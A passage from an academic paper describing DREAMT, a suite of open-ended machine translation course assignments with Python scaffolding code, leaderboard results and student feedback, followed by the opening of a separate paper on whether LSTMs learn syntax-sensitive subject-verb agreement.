implemented in Python (Chiang, 2007; Huang and Chiang, 2007). 4 Thanks to an anonymous reviewer for this turn of phrase. This scheme provided strong incentive to continue experimentation beyond the target algorithm.5 For each assignment, students could form teams of any size, under three rules: each team had to pub- licize its formation to the class, all team members agreed to receive the same grade, and teams could not drop members. Our hope was that these require- ments would balance the perceived competitive ad- vantage of collaboration against a reluctance to take (and thus support) teammates who did not contribute to the competitive effort.6 This strategy worked: out of sixteen students, ten opted to work collaboratively on at least one assignment, always in pairs. We provided a web-based leaderboard that dis- played standings on the test data in real time, iden- tifying each submission by a pseudonymous han- dle known only to the team and instructors. Teams could upload solutions as often as they liked before the assignment deadline. The leaderboard displayed scores of the default and target algorithms. This in- centivized an early start, since teams could verify for themselves when they met the threshold for a passing grade. Though effective, it also detracted from realism in one important way: it enabled hill- climbing on the evaluation metric. In early assign- ments, we observed a few cases of this behavior, so for the remaining assignments, we modified the leaderboard so that changes in score would only be reflected once every twelve hours. This strategy trades some amount of scientific realism for some measure of incentive, a strategy that has proven effective in other pedagogical tools with real-time feedback (Spacco et al., 2006). To obtain a grade, teams were required to sub- mit their results, share their code privately with the instructors, and publicly describe their experimen- tal process to the class so that everyone could learn from their collective effort. Teams were free (but not required) to share their code publicly at any time. 5 Grades depend on institutional norms. In our case, high grades in the rest of class combined with matching all assignment tar- get algorithms would earn a B+; beating two target algorithms would earn an A-; top five placement on any assignment would earn an A; and top three placement compensated for weaker grades in other course criteria. Everyone who completed all four assignments placed in the top five at least once. 6 The equilibrium point is a single team, though this team would still need to decide on a division of labor. One student contem- plated organizing this team, but decided against it. Some did so after the assignment deadline. 3 The Alignment Challenge The first challenge was word alignment: given a par- allel text, students were challenged to produce word- to-word alignments with low alignment error rate (AER; Och and Ney, 2000). This is a variant of a classic assignment not just in MT, but in NLP gen- erally. Klein (2005) describes a version of it, and we know several other instructors who use it.7 In most of these, the object is to implement IBM Model 1 or 2, or a hidden Markov model. Our version makes it open-ended by asking students to match or beat an IBM Model 1 baseline. 3.1 Data We provided 100,000 sentences of parallel data from the Canadian Hansards, totaling around two million words.8 This dataset is small enough to align in a few minutes with our implementation—enabling rapid experimentation—yet large enough to obtain reasonable results. In fact, Liang et al. (2006) report alignment accuracy on data of this size that is within a fraction of a point of their accuracy on the com- plete Hansards data. To evaluate, we used manual alignments of a small fraction of sentences, devel- oped by Och and Ney (2000), which we obtained from the shared task resources organized by Mihal- cea and Pedersen (2003). The first 37 sentences of the corpus were development data, with manual alignments provided in a separate file. Test data con- sisted of an additional 447 sentences, for which we did not provide alignments.9 3.2 Implementation We distributed three Python programs with the data. The first, align, computes Dice’s coefficient (1945) for every pair of French and English words, then aligns every pair for which its value is above an adjustable threshold. Our implementation (most of 7 Among them, Jordan Boyd-Graber, John DeNero, Philipp Koehn, and Slav Petrov (personal communication). 8 http://www.isi.edu/natural-language/download/hansard/ 9 This invited the possibility of cheating, since alignments of the test data are publicly available on the web. We did not adver- tise this, but as an added safeguard we obfuscated the data by distributing the test sentences randomly throughout the file. Listing 1 The default aligner in DREAMT: thresh- olding Dice’s coefficient. for (f, e) in bitext: for f_i in set(f): f_count[f_i] += 1 for e_j in set(e): fe_count[(f_i,e_j)] += 1 for e_j in set(e): e_count[e_j] += 1 for (f_i, e_j) in fe_count.keys(): dice[(f_i,e_j)] = \ 2.0 * fe_count[(f_i, e_j)] / \ (f_count[f_i] + e_count[e_j]) for (f, e) in bitext: for (i, f_i) in enumerate(f): for (j, e_j) in enumerate(e): if dice[(f_i,e_j)] >= cutoff: print "%i-%i " % (i,j) which is shown in Listing 1) is quite close to pseu- docode, making it easy to focus on the algorithm, one of our pedagogical goals. The grade program computes AER and optionally prints an alignment grid for sentences in the development data, showing both human and automatic alignments. Finally the check program verifies that the results represent a valid solution, reporting an error if not—enabling students to diagnose bugs in their submissions. The default implementation enabled immediate experimentation. On receipt of the code, students were instructed to align the first 1,000 sentences and compute AER using a simple command. > align -n 1000 | grade By varying the number of input sentences and the threshold for an alignment, students could immediately see the effect of various parameters on alignment quality. We privately implemented IBM Model 1 (Brown et al., 1993) as the target algorithm for a passing grade. We ran it for five iterations with English as the target language and French as the source. Our implementation did not use null alignment or symmetrization—leaving out these common im- provements offered students the possibility of dis- covering them independently, and thereby rewarded. A E R × 10 0 20 30 40 50 60 -1 6 d a y s -1 4 d a y s -1 2 d a y s -1 0 d a y s -8 d a y s -6 d a y s -4 d a y s -2 d a y s d u e Figure 1: Submission history for the alignment challenge. Dashed lines represent the default and baseline system performance. Each colored line represents a student, and each dot represents a submission. For clarity, we show only submissions that improved the student’s AER. 3.3 Challenge Results We received 209 submissions from 11 teams over a period of two weeks (Figure 1). Everyone eventually matched or exceeded IBM Model 1 AER of 31.26. Most students implemented IBM Model 1, but we saw many other solutions, indicating that many truly experimented with the problem: • Implementing heuristic constraints to require alignment of proper names and punctuation. • Running the algorithm on stems rather than sur- face words. • Initializing the first iteration of Model 1 with parameters estimated on the observed align- ments in the development data. • Running Model 1 for many iterations. Most re- searchers typically run Model 1 for five itera- tions or fewer, and there are few experiments in the literature on its behavior over many iter- ations, as there are for hidden Markov model taggers (Johnson, 2007). Our students carried out these experiments, reporting runs of 5, 20, 100, and even 2000 iterations. No improve- ment was observed after 20 iterations. • Implementing various alternative approaches from the literature, including IBM Model 2 (Brown et al., 1993), competitive linking (Melamed, 2000), and smoothing (Moore, 2004). One of the best solutions was competitive linking with Dice’s coefficient, modified to incorporate the observation that alignments tend to be monotonic by restricting possible alignment points to a window of eight words around the diagonal. Although simple, it acheived an AER of 18.41, an error reduction over Model 1 of more than 40%. The best score compares unfavorably against a state-of-the-art AER of 3.6 (Liu et al., 2010). But under a different view, it still represents a significant amount of progress for an effort taking just over two weeks: on the original challenge from which we ob- tained the data (Mihalcea and Pedersen, 2003) the best student system would have placed fifth out of fifteen systems. Consider also the combined effort of all the students: when we trained a perceptron clas- sifier on the development data, taking each student’s prediction as a feature, we obtained an AER of 15.4, which would have placed fourth on the original chal- lenge. This is notable since none of the systems incorporated first-order dependencies on the align- ments of adjacent words, long noted as an impor- tant feature of the best alignment models (Och and Ney, 2003). Yet a simple system combination of stu- dent assignments is as effective as a hidden Markov Model trained on a comparable amount of data (Och and Ney, 2003). It is important to note that AER does not neces- sarily correlate with downstream performance, par- ticularly on the Hansards dataset (Fraser and Marcu, 2007). We used the conclusion of the assignment as an opportunity to emphasize this point. 4 The Decoding Challenge The second challenge was decoding: given a fixed translation model and a set of input sentences, stu- dents were challenged to produce translations with the highest model score. This challenge introduced the difficulties of combinatorial optimization under a deceptively simple setup: the model we provided was a simple phrase-based translation model (Koehn et al., 2003) consisting only of a phrase table and tri- gram language model. Under this simple model, for a French sentence f of length I, English sentence e of length J, and alignment a where each element consists of a span in both e and f such that every word in both e and f is aligned exactly once, the conditional probability of e and a given f is as fol- lows.10 p(e,a|f) = ∏ 〈i,i′,j,j′〉∈a p(fi ′ i |e j′ j ) J+1∏ j=1 p(ej|ej−1,ej−2) (1) To evaluate output, we compute the conditional probability of e as follows. p(e|f) = ∑ a p(e,a|f) (2) Note that this formulation is different from the typ- ical Viterbi objective of standard beam search de- coders, which do not sum over all alignments, but approximate p(e|f) by maxa p(e,a|f). Though the computation in Equation 2 is intractable (DeNero and Klein, 2008), it can be computed in a few min- utes via dynamic programming on reasonably short sentences. We ensured that our data met this crite- rion. The corpus-level probability is then the prod- uct of all sentence-level probabilities in the data. The model includes no distortion limit or distor- tion model, for two reasons. First, leaving out the distortion model slightly simplifies the implementa- tion, since it is not necessary to keep track of the last word translated in a beam decoder; we felt that this detail was secondary to understanding the difficulty of search over phrase permutations. Second, it actu- ally makes the problem more difficult, since a simple distance-based distortion model prefers translations with fewer permutations; without it, the model may easily prefer any permutation of the target phrases, making even the Viterbi search problem exhibit its true NP-hardness (Knight, 1999a; Zaslavskiy et al., 2009). Since the goal was to find the translation with the highest probability, we did not provide a held-out test set; with access to both the input sentences and 10 For simplicity, this formula assumes that e is padded with two sentence-initial symbols and one sentence-final symbol, and ignores the probability of sentence segmentation, which we take to be uniform. the model, students had enough information to com- pute the evaluation score on any dataset themselves. The difficulty of the challenge lies simply in finding the translation that maximizes the evaluation. In- deed, since the problem is intractable, even the in- structors did not know the true solution.11 4.1 Data We chose 48 French sentences totaling 716 words from the Canadian Hansards to serve as test data. To create a simple translation model, we used the Berkeley aligner to align the parallel text from the first assignment, and extracted a phrase table using the method of Lopez (2007), as implemented in cdec (Dyer et al., 2010). To create a simple language model, we used SRILM (Stolcke, 2002). 4.2 Implementation We distributed two Python programs. The first, decode, decodes the test data monotonically— using both the language model and translation model, but without permuting phrases. The imple- mentation is completely self-contained with no ex- ternal dependencies: it implements both models and a simple stack decoding algorithm for monotonic translation. It contains only 122 lines of Python— orders of magnitude fewer than most full-featured decoders. To see its similarity to pseudocode, com- pare the decoding algorithm (Listing 2) with the pseudocode in Koehn’s (2010) popular textbook (re- produced here as Algorithm 1). The second pro- gram, grade, computes the log-probability of a set of translations, as outline above. We privately implemented a simple stack decoder that searched over permutations of phrases, similar to Koehn (2004). Our implementation increased the codebase by 44 lines of code and included param- eters for beam size, distortion limit, and the maxi- mum number of translations considered for each in- put phrase. We posted a baseline to the leaderboard using values of 50, 3, and 20 for these, respectively. 11 We implemented a version of the Lagrangian relaxation algo- rithm of Chang and Collins (2011), but found it difficult to obtain tight (optimal) solutions without iteratively reintroduc- ing all of the original constraints. We suspect this is due to the lack of a distortion penalty, which enforces a strong pref- erence towards translations with little reordering. However, the solution found by this algorithm is only approximates the objective implied by Equation 2, which sums over alignments. We also posted an oracle containing the most prob- able output for each sentence, selected from among all submissions received so far. The intent of this oracle was to provide a lower bound on the best pos- sible output, giving students additional incentive to continue improving their systems. 4.3 Challenge Results We received 71 submissions from 10 teams (Fig- ure 2), again exhibiting variety of solutions. • Implementation of greedy decoder which at each step chooses the most probable translation from among those reachable by a single swap or retranslation (Germann et al., 2001; Langlais et al., 2007). • Inclusion of heuristic estimates of future cost. • Implementation of a private oracle. Some stu- dents observed that the ideal beam setting was not uniform across the corpus. They ran their decoder under different settings, and then se- lected the most probable translation of each sentence. Many teams who implemented the standard stack decoding algorithm experimented heavily with its pruning parameters. The best submission used ex- tremely wide beam settings in conjunction with a reimplementation of the future cost estimate used in Moses (Koehn et al., 2007). Five of the submissions beat Moses using its standard beam settings after it had been configured to decode with our model. We used this assignment to emphasize the im- portance of good models: the model score of the submissions was generally inversely correlated with BLEU, possibly because our simple model had no distortion limits. We used this to illustrate the differ- ence between model error and search error, includ- ing fortuitous search error (Germann et al., 2001) made by decoders with less accurate search. 5 The Evaluation Challenge The third challenge was evaluation: given a test cor- pus with reference translations and the output of sev- eral MT systems, students were challenged to pro- duce a ranking of the systems that closely correlated with a human ranking. Listing 2 The default decoder in DREAMT: a stack decoder for monotonic translation. stacks = [{} for _ in f] + [{}] stacks[0][lm.begin()] = initial_hypothesis for i, stack in enumerate(stacks[:-1]): for h in sorted(stack.itervalues(),key=lambda h: -h.logprob)[:alpha]: for j in xrange(i+1,len(f)+1): if f[i:j] in tm: for phrase in tm[f[i:j]]: logprob = h.logprob + phrase.logprob lm_state = h.lm_state for word in phrase.english.split(): (lm_state, word_logprob) = lm.score(lm_state, word) logprob += word_logprob logprob += lm.end(lm_state) if j == len(f) else 0.0 new_hypothesis = hypothesis(logprob, lm_state, h, phrase) if lm_state not in stacks[j] or \ stacks[j][lm_state].logprob < logprob: stacks[j][lm_state] = new_hypothesis winner = max(stacks[-1].itervalues(), key=lambda h: h.logprob) def extract_english(h): return "" if h.predecessor is None else "%s%s " % (extract_english(h.predecessor), h.phrase.english) print extract_english(winner) Algorithm 1 Basic stack decoding algorithm, adapted from Koehn (2010), p. 165. place empty hypothesis into stack 0 for all stacks 0...n− 1 do for all hypotheses in stack do for all translation options do if applicable then create new hypothesis place in stack recombine with existing hypothesis prune stack if too big 5.1 Data We chose the English-to-German translation sys- tems from the 2009 and 2011 shared task at the an- nual Workshop for Machine Translation (Callison- Burch et al., 2009; Callison-Burch et al., 2011), pro- viding the first as development data and the second as test data. We chose these sets because BLEU (Papineni et al., 2002), our baseline metric, per- formed particularly poorly on them; this left room for improvement in addition to highlighting some lo g 1 0 p (e |f ) − C -1200 -1250 -1300 -1350 -1400 -2 0 d a y s -1 8 d a y s -1 6 d a y s -1 4 d a y s -1 2 d a y s -1 0 d a y s -8 d a y s -6 d a y s -4 d a y s -2 d a y s d u e Figure 2: Submission history for the decoding challenge. The dotted green line represents the oracle over submis- sions. deficiencies of BLEU. For each dataset we pro- vided the source and reference sentences along with anonymized system outputs. For the development data we also provided the human ranking of the sys- tems, computed from pairwise human judgements according to a formula recommended by Bojar et al. (2011).12 5.2 Implementation We provided three simple Python programs: evaluate implements a simple ranking of the sys- tems based on position-independent word error rate (PER; Tillmann et al., 1997), which computes a bag- of-words overlap between the system translations and the reference. The grade program computes Spearman’s ρ between the human ranking and an output ranking. The check program simply ensures that a submission contains a valid ranking. We were concerned about hill-climbing on the test data, so we modified the leaderboard to report new results only twice a day. This encouraged students to experiment on the development data before posting new submissions, while still providing intermittent feedback. We privately implemented a version of BLEU, which obtained a correlation of 38.6 with the human rankings, a modest improvement over the baseline of 34.0. Our implementation underperforms the one reported in Callison-Burch et al. (2011) since it per- forms no tokenization or normalization of the data. This also left room for improvement. 5.3 Evaluation Challenge Results We received 212 submissions from 12 teams (Fig- ure 3), again demonstrating a wide range of tech- niques. • Experimentation with the maximum n-gram length and weights in BLEU. • Implementation of smoothed versions of BLEU (Lin and Och, 2004). • Implementation of weighted F-measure to bal- ance both precision and recall. • Careful normalization of the reference and ma- chine translations, including lowercasing and punctuation-stripping. 12 This ranking has been disputed over a series of papers (Lopez, 2012; Callison-Burch et al., 2012; Koehn, 2012). The paper which initiated the dispute, written by the first author, was di- rectly inspired by the experience of designing this assignment. S p e a rm a n ’s ρ 0.8 0.6 0.4 -7 d a y s -6 d a y s -5 d a y s -4 d a y s -3 d a y s -2 d a y s -1 d a y s d u e Figure 3: Submission history for the evaluation chal- lenge. • Implementation of several techniques used in AMBER (Chen and Kuhn, 2005). The best submission, obtaining a correlation of 83.5, relied on the idea that the reference and ma- chine translation should be good paraphrases of each other (Owczarzak et al., 2006; Kauchak and Barzi- lay, 2006). It employed a simple paraphrase sys- tem trained on the alignment challenge data, us- ing the pivot technique of Bannard and Callison- Burch (2005), and computing the optimal alignment between machine translation and reference under a simple model in which words could align if they were paraphrases. When compared with the 20 systems submitted to the original task from which the data was obtained (Callison-Burch et al., 2011), this system would have ranked fifth, quite near the top-scoring competitors, whose correlations ranged from 88 to 94. 6 The Reranking Challenge The fourth challenge was reranking: given a test cor- pus and a large N-best list of candidate translations for each sentence, students were challenged to select a candidate translation for each sentence to produce a high corpus-level BLEU score. Due to an error our data preparation, this assignment had a simple solution that was very difficult to improve on. Nev- ertheless, it featured several elements that may be useful for future courses. 6.1 Data We obtained 300-best lists from a Spanish-English translation system built with the Joshua toolkit (Ganitkevitch et al., 2012) using data and resources from the 2011 Workshop on Machine Translation (Callison-Burch et al., 2011). We provided 1989 training sentences, consisting of source and refer- ence sentences along with the candidate translations. We also included a test set of 250 sentences, for which we provided only the source and candidate translations. Each candidate translation included six features from the underlying translation system, out of an original 21; our hope was that students might rediscover some features through experimentation. 6.2 Implementation We conceived of the assignment as one in which stu- dents could apply machine learning or feature engi- neering to the task of reranking the systems, so we provided several tools. The first of these, learn, was a simple program that produced a vector of feature weights using pairwise ranking optimization (PRO; Hopkins and May, 2011), with a perceptron as the underlying learning algorithm. A second, rerank, takes a weight vector as input and reranks the sentences; both programs were designed to work with arbitrary numbers of features. The grade pro- gram computed the BLEU score on development data, while check ensured that a test submission is valid. Finally, we provided an oracle program, which computed a lower bound on the achievable BLEU score on the development data using a greedy approximation (Och et al., 2004). The leaderboard likewise displayed an oracle on test data. We did not assign a target algorithm, but left the assignment fully open-ended. 6.3 Reranking Challenge Outcome For each assignment, we made an effort to create room for competition above the target algorithm. However, we did not accomplish this in the rerank- ing challenge: we had removed most of the features from the candidate translations, in hopes that stu- dents might reinvent some of them, but we left one highly predictive implicit feature in the data: the rank order of the underlying translation system. Stu- dents discovered that simply returning the first can- didate earned a very high score, and most of them quickly converged to this solution. Unfortunately, the high accuracy of this baseline left little room for additional competition. Nevertheless, we were en- couraged that most students discovered this by acci- dent while attempting other strategies to rerank the translations. • Experimentation with parameters of the PRO algorithm. • Substitution of alternative learning algorithms. • Implementation of a simplified minimum Bayes risk reranker (Kumar and Byrne, 2004). Over a baseline of 24.02, the latter approach ob- tained a BLEU of 27.08, nearly matching the score of 27.39 from the underlying system despite an im- poverished feature set. 7 Pedagogical Outcomes Could our students have obtained similar results by running standard toolkits? Undoubtedly. However, our goal was for students to learn by doing: they obtained these results by implementing key MT al- gorithms, observing their behavior on real data, and improving them. This left them with much more in- sight into how MT systems actually work, and in this sense, DREAMT was a success. At the end of class, we requested written feedback on the design of the assignments. Many commented positively on the motivation provided by the challenge problems: • The immediate feedback of the automatic grad- ing was really nice. • Fast feedback on my submissions and my rela- tive position on the leaderboard kept me both motivated to start the assignments early and to constantly improve them. Also knowing how well others were doing was a good way to gauge whether I was completely off track or not when I got bad results. • The homework assignments were very engag- ing thanks to the clear yet open-ended setup and their competitive aspects. Students also commented that they learned a lot about MT and even research in general: Question 1 2 3 4 5 N/A Feedback on my work for this course is useful - - - 4 9 3 This course enhanced my ability to work effectively in a team 1 - 5 8 2 - Compared to other courses at this level, the workload for this course is high - 1 7 6 1 1 Table 1: Response to student survey questions on a Likert scale from 1 (strongly disagree) to 5 (strongly agree). • I learned the most from the assignments. • The assignments always pushed me one step more towards thinking out loud how the par- ticular task can be completed. • I appreciated the setup of the homework prob- lems. I think it has helped me learn how to set up and attack research questions in an or- ganized way. I have a much better sense for what goes into an MT system and what prob- lems aren’t solved. We also received feedback through an anonymous survey conducted at the end of the course before posting final grades. Each student rated aspects of the course on a five point Likert scale, from 1 (strongly disagree) to 5 (strongly agree). Several questions pertained to assignments (Table 1), and al- lay two possible concerns about competition: most students felt that the assignments enhanced their col- laborative skills, and that their open-endedness did not result in an overload of work. For all survey questions, student satisfaction was higher than av- erage for courses in our department. 8 Discussion DREAMT is inspired by several different ap- proaches to teaching NLP, AI, and computer sci- ence. Eisner and Smith (2008) teach NLP using a competitive game in which students aim to write fragments of English grammar. Charniak et al. (2000) improve the state-of-the-art in a reading com- prehension task as part of a group project. Christo- pher et al. (1993) use NACHOS, a classic tool for teaching operating systems by providing a rudimen- tary system that students then augment. DeNero and Klein (2010) devise a series of assignments based on Pac-Man, for which students implement several classic AI techniques. A crucial element in such ap- proaches is a highly functional but simple scaffold- ing. The DREAMT codebase, including grading and validation scripts, consists of only 656 lines of code (LOC) over four assignments: 141 LOC for align- ment, 237 LOC for decoding, 86 LOC for evalua- tion, and 192 LOC for reranking. To simplify imple- mentation further, the optional leaderboard could be delegated to Kaggle.com, a company that organizes machine learning competitions using a model sim- ilar to the Netflix Challenge (Bennet and Lanning, 2007), and offers pro bono use of its services for educational challenge problems. A recent machine learning class at Oxford hosted its assignments on Kaggle (Phil Blunsom, personal communication). We imagine other uses of DREAMT. It could be used in an inverted classroom, where students view lecture material outside of class and work on prac- tical problems in class. It might also be useful in massive open online courses (MOOCs). In this for- mat, course material (primarily lectures and quizzes) is distributed over the internet to an arbitrarily large number of interested students through sites such as coursera.org, udacity.com, and khanacademy.org. In many cases, material and problem sets focus on spe- cific techniques. Although this is important, there is also a place for open-ended problems on which stu- dents apply a full range of problem-solving skills. Automatic grading enables them to scale easily to large numbers of students. On the scientific side, the scale of MOOCs might make it possible to empirically measure the effec- tiveness of hands-on or competitive assignments, by comparing course performance of students who work on them against that of those who do not. Though there is some empirical work on competi- tive assignments in the computer science education literature (Lawrence, 2004; Garlick and Akl, 2006; Regueras et al., 2008; Ribeiro et al., 2009), they generally measure student satisfaction and retention rather than the more difficult question of whether such assignments actually improve student learning. However, it might be feasible to answer such ques- tions in large, data-rich virtual classrooms offered by MOOCs. This is an interesting potential avenue for future work. Because our class came within reach of state-of- the-art on each problem within a matter of weeks, we wonder what might happen with a very large body of competitors. Could real innovation oc- cur? Could we solve large-scale problems? It may be interesting to adopt a different incentive struc- ture, such as one posed by Abernethy and Frongillo (2011) for crowdsourcing machine learning prob- lems: rather than competing, everyone works to- gether to solve a shared task, with credit awarded proportional to the contribution that each individual makes. In this setting, everyone stands to gain: stu- dents learn to solve problems as they are found in the real world, instructors learn new insights into the problems they pose, and, in the long run, users of AI technology benefit from overall improvements. Hence it is possible that posing open-ended, real- world problems to students might be a small piece of the puzzle of providing high-quality NLP tech- nologies. Acknowledgments We are grateful to Colin Cherry and Chris Dyer for testing the assignments in different settings and providing valuable feedback, and to Jessie Young for implementing a dual decomposition solution to the decoding assignment. We thank Jason Eis- ner, Frank Ferraro, Yoav Goldberg, Matt Gormley, Ann Irvine, Rebecca Knowles, Ben Mitchell, Court- ney Napoles, Michael Rushanan, Joanne Selinski, Svitlana Volkova, and the anonymous reviewers for lively discussion and helpful comments on previous drafts of this paper. Any errors are our own. References J. Abernethy and R. M. Frongillo. 2011. A collaborative mechanism for crowdsourcing prediction problems. In Proc. of NIPS. C. Bannard and C. Callison-Burch. 2005. Paraphrasing with bilingual parallel corpora. In Proc. of ACL. J. Bennet and S. Lanning. 2007. The netflix prize. In Proc. of the KDD Cup and Workshop. S. Bird, E. Klein, E. Loper, and J. Baldridge. 2008. Multidisciplinary instruction with the natural language toolkit. In Proc. of Workshop on Issues in Teaching Computational Linguistics. O. Bojar, M. Ercegovčević, M. Popel, and O. Zaidan. 2011. A grain of salt for the WMT manual evaluation. In Proc. of WMT. P. E. Brown, S. A. D. Pietra, V. J. D. Pietra, and R. L. Mercer. 1993. The mathematics of statistical machine translation: Parameter estimation. Computational Lin- guistics, 19(2). C. Callison-Burch, P. Koehn, C. Monz, and J. Schroeder. 2009. Findings of the 2009 workshop on statistical machine translation. In Proc. of WMT. C. Callison-Burch, P. Koehn, C. Monz, and O. Zaidan. 2011. Findings of the 2011 workshop on statistical machine translation. In Proc. of WMT. C. Callison-Burch, P. Koehn, C. Monz, M. Post, R. Sori- cut, and L. Specia. 2012. Findings of the 2012 work- shop on statistical machine translation. In Proc. of WMT. Y.-W. Chang and M. Collins. 2011. Exact decoding of phrase-based translation models through Lagrangian relaxation. In Proc. of EMNLP. E. Charniak, Y. Altun, R. de Salvo Braz, B. Garrett, M. Kosmala, T. Moscovich, L. Pang, C. Pyo, Y. Sun, W. Wy, Z. Yang, S. Zeiler, and L. Zorn. 2000. Read- ing comprehension programs in a statistical-language- processing class. In Proc. of Workshop on Read- ing Comprehension Tests as Evaluation for Computer- Based Language Understanding Systems. B. Chen and R. Kuhn. 2005. AMBER: A modified BLEU, enhanced ranking metric. In Proc. of WMT. D. Chiang. 2007. Hierarchical phrase-based translation. Computational Linguistics, 33(2). W. A. Christopher, S. J. Procter, and T. E. Anderson. 1993. The nachos instructional operating system. In Proc. of USENIX. J. DeNero and D. Klein. 2008. The complexity of phrase alignment problems. In Proc. of ACL. J. DeNero and D. Klein. 2010. Teaching introductory articial intelligence with Pac-Man. In Proc. of Sym- posium on Educational Advances in Artificial Intelli- gence. L. R. Dice. 1945. Measures of the amount of ecologic association between species. Ecology, 26(3):297–302. C. Dyer, A. Lopez, J. Ganitkevitch, J. Weese, F. Ture, P. Blunsom, H. Setiawan, V. Eidelman, and P. Resnik. 2010. cdec: A decoder, alignment, and learning framework for finite-state and context-free translation models. In Proc. of ACL. J. Eisner and N. A. Smith. 2008. Competitive grammar writing. In Proc. of Workshop on Issues in Teaching Computational Linguistics. A. Fraser and D. Marcu. 2007. Measuring word align- ment quality for statistical machine translation. Com- putational Linguistics, 33(3). J. Ganitkevitch, Y. Cao, J. Weese, M. Post, and C. Callison-Burch. 2012. Joshua 4.0: Packing, PRO, and paraphrases. In Proc. of WMT. R. Garlick and R. Akl. 2006. Intra-class competitive assignments in CS2: A one-year study. In Proc. of International Conference on Engineering Education. U. Germann, M. Jahr, K. Knight, D. Marcu, and K. Ya- mada. 2001. Fast decoding and optimal decoding for machine translation. In Proc. of ACL. L. Huang and D. Chiang. 2007. Forest rescoring: Faster decoding with integrated language models. In Proc. of ACL. M. Johnson. 2007. Why doesn’t EM find good HMM POS-taggers? In Proc. of EMNLP. D. Jurafsky and J. H. Martin. 2009. Speech and Lan- guage Processing. Prentice Hall, 2nd edition. D. Kauchak and R. Barzilay. 2006. Paraphrasing for automatic evaluation. In Proc. of HLT-NAACL. D. Klein. 2005. A core-tools statistical NLP course. In Proc. of Workshop on Effective Tools and Methodolo- gies for Teaching NLP and CL. K. Knight. 1999a. Decoding complexity in word- replacement translation models. Computational Lin- guistics, 25(4). K. Knight. 1999b. A statistical MT tutorial workbook. P. Koehn, F. J. Och, and D. Marcu. 2003. Statistical phrase-based translation. In Proc. of NAACL. P. Koehn, H. Hoang, A. Birch, C. Callison-Burch, M. Federico, N. Bertoldi, B. Cowan, W. Shen, C. Moran, R. Zens, C. Dyer, O. Bojar, A. Constantin, and E. Herbst. 2007. Moses: Open source toolkit for statistical machine translation. In Proc. of ACL. P. Koehn. 2004. Pharaoh: a beam search decoder for phrase-based statistical machine translation models. In Proc. of AMTA. P. Koehn. 2010. Statistical Machine Translation. Cam- bridge University Press. P. Koehn. 2012. Simulating human judgment in machine translation evaluation campaigns. In Proc. of IWSLT. S. Kumar and W. Byrne. 2004. Minimum bayes-risk decoding for statistical machine translation. In Proc. of HLT-NAACL. P. Langlais, A. Patry, and F. Gotti. 2007. A greedy de- coder for phrase-based statistical machine translation. In Proc. of TMI. R. Lawrence. 2004. Teaching data structures using competitive games. IEEE Transactions on Education, 47(4). P. Liang, B. Taskar, and D. Klein. 2006. Alignment by agreement. In Proc. of NAACL. C.-Y. Lin and F. J. Och. 2004. ORANGE: a method for evaluating automatic evaluation metrics for machine translation. In Proc. of COLING. Y. Liu, Q. Liu, and S. Lin. 2010. Discriminative word alignment by linear modeling. Computational Lin- guistics, 36(3). A. Lopez. 2007. Hierarchical phrase-based translation with suffix arrays. In Proc. of EMNLP. A. Lopez. 2008. Statistical machine translation. ACM Computing Surveys, 40(3). A. Lopez. 2012. Putting human assessments of machine translation systems in order. In Proc. of WMT. N. Madnani and B. Dorr. 2008. Combining open-source with research to re-engineer a hands-on introductory NLP course. In Proc. of Workshop on Issues in Teach- ing Computational Linguistics. I. D. Melamed. 2000. Models of translational equiv- alence among words. Computational Linguistics, 26(2). R. Mihalcea and T. Pedersen. 2003. An evaluation ex- ercise for word alignment. In Proc. on Workshop on Building and Using Parallel Texts. R. C. Moore. 2004. Improving IBM word alignment model 1. In Proc. of ACL. F. J. Och and H. Ney. 2000. Improved statistical align- ment models. In Proc. of ACL. F. J. Och and H. Ney. 2003. A systematic comparison of various statistical alignment models. Computational Linguistics, 29. F. J. Och, D. Gildea, S. Khudanpur, A. Sarkar, K. Ya- mada, A. Fraser, S. Kumar, L. Shen, D. Smith, K. Eng, V. Jain, Z. Jin, and D. Radev. 2004. A smorgasbord of features for statistical machine translation. In Proc. of NAACL. K. Owczarzak, D. Groves, J. V. Genabith, and A. Way. 2006. Contextual bitext-derived paraphrases in auto- matic MT evaluation. In Proc. of WMT. K. Papineni, S. Roukos, T. Ward, and W.-J. Zhu. 2002. Bleu: a method for automatic evaluation of machine translation. In Proc. of ACL. L. Regueras, E. Verdú, M. Verdú, M. Pérez, J. de Castro, and M. Muñoz. 2008. Motivating students through on-line competition: An analysis of satisfaction and learning styles. P. Ribeiro, M. Ferreira, and H. Simões. 2009. Teach- ing artificial intelligence and logic programming in a competitive environment. Informatics in Education, (Vol 8 1):85. J. Spacco, D. Hovemeyer, W. Pugh, J. Hollingsworth, N. Padua-Perez, and F. Emad. 2006. Experiences with marmoset: Designing and using an advanced submis- sion and testing system for programming courses. In Proc. of Innovation and technology in computer sci- ence education. A. Stolcke. 2002. SRILM - an extensible language mod- eling toolkit. In Proc. of ICSLP. C. Tillmann, S. Vogel, H. Ney, A. Zubiaga, and H. Sawaf. 1997. Accelerated DP based search for statistical translation. In Proc. of European Conf. on Speech Communication and Technology. M. Zaslavskiy, M. Dymetman, and N. Cancedda. 2009. Phrase-based statistical machine translation as a trav- eling salesman problem. In Proc. of ACL. work_w42xlvpc3nagplvbetz6f74zyy ---- Assessing the Ability of LSTMs to Learn Syntax-Sensitive Dependencies Tal Linzen1,2 Emmanuel Dupoux1 LSCP1 & IJN2, CNRS, EHESS and ENS, PSL Research University {tal.linzen, emmanuel.dupoux}@ens.fr Yoav Goldberg Computer Science Department Bar Ilan University yoav.goldberg@gmail.com Abstract The success of long short-term memory (LSTM) neural networks in language process- ing is typically attributed to their ability to capture long-distance statistical regularities. Linguistic regularities are often sensitive to syntactic structure; can such dependencies be captured by LSTMs, which do not have ex- plicit structural representations? We begin ad- dressing this question using number agreement in English subject-verb dependencies. We probe the architecture’s grammatical compe- tence both using training objectives with an explicit grammatical target (number prediction, grammaticality judgments) and using language models. In the strongly supervised settings, the LSTM achieved very high overall accu- racy (less than 1% errors), but errors increased when sequential and structural information con- flicted. The frequency of such errors rose sharply in the language-modeling setting. We conclude that LSTMs can capture a non-trivial amount of grammatical structure given targeted supervision, but stronger architectures may be required to further reduce errors; furthermore, the language modeling signal is insufficient for capturing syntax-sensitive dependencies, and should be supplemented with more direct supervision if such dependencies need to be captured. 1 Introduction Recurrent neural networks (RNNs) are highly effec- tive models of sequential data (Elman, 1990). The rapid adoption of RNNs in NLP systems in recent years, in particular of RNNs with gating mecha- nisms such as long short-term memory (LSTM) units (Hochreiter and Schmidhuber, 1997) or gated recur- rent units (GRU) (Cho et al., 2014), has led to sig- nificant gains in language modeling (Mikolov et al., 